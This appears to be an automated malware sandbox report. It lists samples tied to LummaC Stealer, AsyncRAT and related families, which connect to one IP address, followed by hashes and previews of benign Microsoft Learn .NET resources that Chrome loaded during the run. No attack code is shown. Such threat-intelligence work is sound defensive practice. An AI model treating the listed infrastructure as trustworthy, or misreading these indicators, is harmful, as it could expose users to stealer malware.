                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, StealcBrowse
                                                                                                                                                                                    • 104.21.16.9
                                                                                                                                                                                    crypted_LummaC2.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 104.21.16.9
                                                                                                                                                                                    crypted_LummaC2 (3).exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 104.21.16.9
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 104.21.16.9
                                                                                                                                                                                    Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 104.21.16.9
                                                                                                                                                                                    file.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 104.21.16.9
                                                                                                                                                                                    bUAmCazc.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    • 104.21.16.9
                                                                                                                                                                                    No context
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1173007
                                                                                                                                                                                    Entropy (8bit):5.503893944397598
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                    MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                    SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                    SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                    SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1817143
                                                                                                                                                                                    Entropy (8bit):5.501007973622959
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                    MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                    SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                    SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                    SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1432
                                                                                                                                                                                    Entropy (8bit):4.986131881931089
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                    MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                    SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                    SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                    SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1154
                                                                                                                                                                                    Entropy (8bit):4.59126408969148
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                    MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                    SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                    SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                    SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                    Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):19696
                                                                                                                                                                                    Entropy (8bit):7.9898910353479335
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                    MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                    SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                    SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                    SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                    Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):33148
                                                                                                                                                                                    Entropy (8bit):4.917595394577667
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                    MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                    SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                    SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                    SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                    Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):35005
                                                                                                                                                                                    Entropy (8bit):7.980061050467981
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                    MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                    SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                    SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                    SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):13842
                                                                                                                                                                                    Entropy (8bit):7.802399161550213
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                    MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                    SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                    SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                    SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4897
                                                                                                                                                                                    Entropy (8bit):4.8007377074457604
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                    MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                    SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                    SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                    SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):47062
                                                                                                                                                                                    Entropy (8bit):5.016115705165622
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                    MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                    SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                    SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                    SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                    Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3130
                                                                                                                                                                                    Entropy (8bit):4.790069981348324
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                    MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                    SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                    SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                    SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                    Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):18367
                                                                                                                                                                                    Entropy (8bit):7.7772261735974215
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                    MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                    SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                    SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                    SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):13339
                                                                                                                                                                                    Entropy (8bit):7.683569563478597
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                    MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                    SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                    SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                    SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):18367
                                                                                                                                                                                    Entropy (8bit):7.7772261735974215
                                                                                                                                                                                    Encrypted:false
